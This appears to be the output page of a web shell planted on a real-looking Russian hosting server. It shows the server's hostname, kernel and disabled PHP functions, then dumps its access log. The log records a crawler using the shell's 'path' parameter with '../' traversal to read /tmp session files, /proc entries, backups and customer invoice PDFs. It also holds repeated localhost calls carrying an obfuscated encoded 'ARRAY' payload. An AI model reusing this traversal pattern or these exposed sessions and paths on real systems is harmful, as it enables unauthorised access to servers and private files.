uawdijnntqw1x1x1
IP : 216.73.216.215
Hostname : xhost1.intravision.ru
Kernel : Linux xhost1.intravision.ru 3.16.0-7-amd64 #1 SMP Debian 3.16.59-1 (2018-10-03) x86_64
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
OS : Linux
PATH:
/
var
/
www
/
tiskom
/
data
/
..
/
.
/
data
/
logs
/
tiskom.xhost.intravision.ru.access.log
/
/
216.73.216.215 - - [13/Jan/2026:06:54:10 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2F..%2Ftmp%2Fsess_fd23a1dd6bcfa68c8d2e83c2eb0bd503 HTTP/1.0" 200 1383 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:06:48:52 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383237393733322p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383237363133322q3933343465366166653565376363303538303430326562326530663261613466222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:06:54:13 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2F.%2Fsess_fd23a1dd6bcfa68c8d2e83c2eb0bd503 HTTP/1.0" 200 1386 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:54:16 +0300] "GET /072b9/?path=%2Fvar%2F..%2Ftmp%2Fsess_4e91c98f6679633a9b72a49b3289de32 HTTP/1.0" 200 1632 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:54:19 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fapache2%2F..%2Fdpkg%2Finfo%2F.%2Finstallation-report.list HTTP/1.0" 200 1526 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:54:22 +0300] "GET /072b9/?path=%2Fvar%2F..%2Ftmp%2Fsess_6511e89deb94672df93fb55fcc01b930 HTTP/1.0" 200 1631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:54:25 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Finitramfs-tools%2F..%2Fos-prober%2F.%2F. HTTP/1.0" 200 1861 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:54:28 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2F.%2Fsess_08d84dfa2f52b0e14d0b5da08e1e6dc7 HTTP/1.0" 200 1386 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:54:31 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2Fbackup2%2F.%2F..%2Flib%2Fghostscript%2FCMap%2FAdobe-Japan1-6 HTTP/1.0" 200 3462 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
57.141.20.14 - - [13/Jan/2026:06:54:33 +0300] "GET /?product=2005362314 HTTP/1.0" 500 185 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
127.0.0.1 - - [13/Jan/2026:06:49:13 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383237393735332p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383237363135332q3335633465646230643466656635646137613930313235353865643932613463222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:06:54:34 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Ftmp%2F.%2Fsess_08d84dfa2f52b0e14d0b5da08e1e6dc7 HTTP/1.0" 200 1385 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:54:37 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2F..%2Ftmp%2Fsess_08d84dfa2f52b0e14d0b5da08e1e6dc7 HTTP/1.0" 200 1383 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:54:40 +0300] "GET /072b9/?path=%2Fvar%2F..%2Ftmp%2Fsess_3cb90fa9eb23ecd57f6ec1db00d6288f HTTP/1.0" 200 1629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:54:43 +0300] "GET /072b9/?path=%2Fvar%2F..%2Fproc%2F391%2Fattr%2Ffscreate HTTP/1.0" 200 1370 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:54:46 +0300] "GET /?product=164920105 HTTP/1.0" 500 185 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:54:49 +0300] "GET /072b9/?path=%2Fvar%2F..%2Ftmp%2Fsess_2795bd7baa4816a998d2eb6f66cd3bc3 HTTP/1.0" 200 1630 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:54:52 +0300] "GET /072b9/?path=%2Fvar%2Flib%2F.%2Flogrotate%2F..%2Fghostscript%2FCMap%2FAdobe-Korea1-2 HTTP/1.0" 200 3281 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:06:49:34 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383237393737342p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383237363137342q3662363036643636323439353537303339323139633665656432643438653337222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:06:54:55 +0300] "GET /072b9/?path=%2Fvar%2F..%2Ftmp%2Fsess_fd166cc41c63befff941b3c5d55d06a9 HTTP/1.0" 200 1629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:54:59 +0300] "GET /072b9/?path=%2Fvar%2Flib%2F.%2F.%2Finitscripts%2F..%2Finitramfs-tools%2F3.16.0-7-amd64 HTTP/1.0" 200 1435 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:55:01 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2Flib%2Finitscripts%2F..%2Finitramfs-tools%2F3.16.0-7-amd64 HTTP/1.0" 200 1436 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:55:04 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Faptitude%2F..%2Fdpkg%2Finfo%2Fispmanager-pkg-myadmin.postrm HTTP/1.0" 200 1870 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:55:07 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fucf%2F..%2F.%2Fdhcp HTTP/1.0" 200 1952 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:55:10 +0300] "GET /072b9/?path=%2Fvar%2Flib%2F.%2Fucf%2F..%2Fdhcp HTTP/1.0" 200 1953 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:55:13 +0300] "GET /072b9/?path=%2Fvar%2Flib%2F.%2Finitscripts%2F..%2Fdpkg%2Finfo%2Fmlock.md5sums HTTP/1.0" 200 1660 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:06:49:55 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383237393739352p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383237363139352q3161663132626633373135353262666631336565373031663737323336366665222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:06:55:16 +0300] "GET /072b9/?path=%2Fvar%2Fbackup2%2F..%2F.%2Fbackups%2Fdpkg.status.0 HTTP/1.0" 200 259432 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:55:19 +0300] "GET /072b9/?path=%2Fvar%2Fbackup2%2F..%2Fbackups%2F.%2Fdpkg.status.0 HTTP/1.0" 200 259432 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:55:22 +0300] "GET /072b9/?path=%2Fvar%2Frun%2Frpc_pipefs%2F.%2F..%2Fsystemd%2Fgenerator%2Fhwclock.service.d%2F. HTTP/1.0" 200 1982 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.64 - - [13/Jan/2026:06:55:23 +0300] "GET /?product=1504175321 HTTP/1.0" 200 26299 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.215 - - [13/Jan/2026:06:55:25 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Fproc%2F925%2Fnet%2Fconnector HTTP/1.0" 200 1392 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:55:28 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F925%2Fnet%2Fconnector HTTP/1.0" 200 1393 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.64 - - [13/Jan/2026:06:55:29 +0300] "GET /?product=1428790124 HTTP/1.0" 200 25206 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.215 - - [13/Jan/2026:06:55:31 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fmisc%2F..%2Fpam%2Faccount HTTP/1.0" 200 1425 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:55:34 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2Fbackup2%2F.%2F..%2Flib%2Fghostscript%2FCMap%2FUniJIS2004-UTF8-V HTTP/1.0" 200 3900 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:06:50:16 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383237393831362p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383237363231362q3431663035663463616139386438376431613064356564396437653630616632222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:06:55:37 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2Flib%2Fntpdate%2F..%2F.%2Fghostscript%2FCMap%2F.%2F.%2FAdobe-Japan1-90ms-RKSJ HTTP/1.0" 200 4600 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.64 - - [13/Jan/2026:06:55:37 +0300] "GET /?product=1539999758 HTTP/1.0" 200 24851 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
57.141.20.24 - - [13/Jan/2026:06:55:39 +0300] "GET /?product=1866816756 HTTP/1.0" 500 185 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
216.73.216.215 - - [13/Jan/2026:06:55:40 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Fproc%2F129%2F.%2Fcoredump_filter HTTP/1.0" 200 1374 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:55:43 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Fproc%2F.%2F411%2F.%2Fclear_refs HTTP/1.0" 200 1373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
40.77.167.7 - - [13/Jan/2026:06:55:44 +0300] "GET /product/1698323100.htm HTTP/1.0" 200 25340 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.215 - - [13/Jan/2026:06:55:46 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F.%2F411%2F.%2Fclear_refs HTTP/1.0" 200 1373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.167.144.238 - - [13/Jan/2026:06:55:48 +0300] "GET /product/676452190.htm HTTP/1.0" 200 25520 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.215 - - [13/Jan/2026:06:55:50 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F25%2Fautogroup HTTP/1.0" 200 1366 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:55:53 +0300] "GET /072b9/?path=%2Fvar%2F..%2Fproc%2F25%2F.%2Fautogroup HTTP/1.0" 200 1367 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.167.144.16 - - [13/Jan/2026:06:55:53 +0300] "GET /product/1916261513.htm HTTP/1.0" 200 26582 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.215 - - [13/Jan/2026:06:55:56 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fmisc%2F.%2F..%2Fdpkg%2Finfo%2Fphp7.1-sybase.preinst HTTP/1.0" 200 1811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:06:50:37 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383237393833372p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383237363233372q6535623139343430653266343361363039646230613830653264353664333633222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:06:55:59 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Fproc%2F25%2Fautogroup HTTP/1.0" 200 1365 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:56:02 +0300] "GET /072b9/?path=%2Fvar%2F..%2Ftmp%2Fsess_cd548adce4d2f7fdc7f68c155386227f HTTP/1.0" 200 1631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:56:05 +0300] "GET /072b9/?path=%2Fvar%2F..%2Ftmp%2Fsess_d4e95ad740284b286a009bcd729417c4 HTTP/1.0" 200 1631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:56:08 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F32%2F.%2F.%2Fsched HTTP/1.0" 200 1657 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:56:11 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Finitscripts%2F..%2Fdpkg%2Finfo%2Fpoppler-data.md5sums HTTP/1.0" 200 8377 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.167.144.16 - - [13/Jan/2026:06:56:11 +0300] "GET /product/1354280301.htm HTTP/1.0" 200 25086 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.215 - - [13/Jan/2026:06:56:14 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2F..%2Fproc%2F29283%2Fcwd HTTP/1.0" 200 1618 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:56:17 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F.%2F29283%2Fcwd HTTP/1.0" 200 1620 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:06:50:58 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383237393835382p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383237363235382q6431663730303137303135646530373434386538396537333663333035306563222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:06:56:20 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2F.%2Fproc%2F29283%2Fcwd HTTP/1.0" 200 1619 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:56:23 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fmisc%2F.%2F..%2Fmysql_old%2F.%2F. HTTP/1.0" 200 1858 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:56:26 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fmisc%2F..%2Fmysql_old%2F.%2F.%2F. HTTP/1.0" 200 1857 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:56:29 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2F.%2Fproc%2F29283%2Fcwd HTTP/1.0" 200 1619 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:56:32 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2Fbackup2%2F.%2F..%2Flog%2Fsyslog.6.gz HTTP/1.0" 200 1377 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
40.77.167.7 - - [13/Jan/2026:06:56:34 +0300] "GET /product/1600230237.htm HTTP/1.0" 200 25129 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.215 - - [13/Jan/2026:06:56:35 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F27%2Fnet%2F.%2F.%2F. HTTP/1.0" 200 3345 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:06:51:19 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383237393837392p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383237363237392q3535383865613933306235623139356638376437376134393332333533366232222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:06:56:40 +0300] "GET /072b9/?path=%2Fvar%2Ftmp%2F..%2Ffiles%2Fmedcompftp%2Ftestsite_ftp%2Fbill_27074_2017.PDF HTTP/1.0" 200 1400 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:56:43 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Ftmp%2Fsess_27dec80ec2485704da73fcb19942eb38 HTTP/1.0" 200 1634 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:56:46 +0300] "GET /072b9/?path=%2Fvar%2Ftmp%2F..%2Ffiles%2Fmedcompftp%2Ftestsite_ftp%2FTORG12_23726_2016.PDF HTTP/1.0" 200 1404 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
57.141.20.25 - - [13/Jan/2026:06:56:47 +0300] "GET /?product=218274294 HTTP/1.0" 500 185 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
216.73.216.215 - - [13/Jan/2026:06:56:49 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2Fsess_9bebee005b7a7aacff21ee3f887e5fe1 HTTP/1.0" 200 1634 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:56:52 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Ftmp%2Fsess_9bebee005b7a7aacff21ee3f887e5fe1 HTTP/1.0" 200 1633 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:56:55 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2Fsess_27dec80ec2485704da73fcb19942eb38 HTTP/1.0" 200 1636 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:56:58 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fapache2%2F..%2Fdpkg%2Finfo%2Fdovecot-pop3d.prerm HTTP/1.0" 200 1480 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:06:51:40 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383237393930302p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383237363330302q6665333430396339656132303533323162326530643034393634336131353063222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
